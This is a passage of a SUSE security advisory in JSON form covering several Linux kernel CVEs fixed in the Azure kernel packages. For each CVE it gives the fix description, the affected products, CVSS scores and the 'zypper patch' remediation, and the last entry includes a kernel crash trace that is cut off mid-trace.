"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n 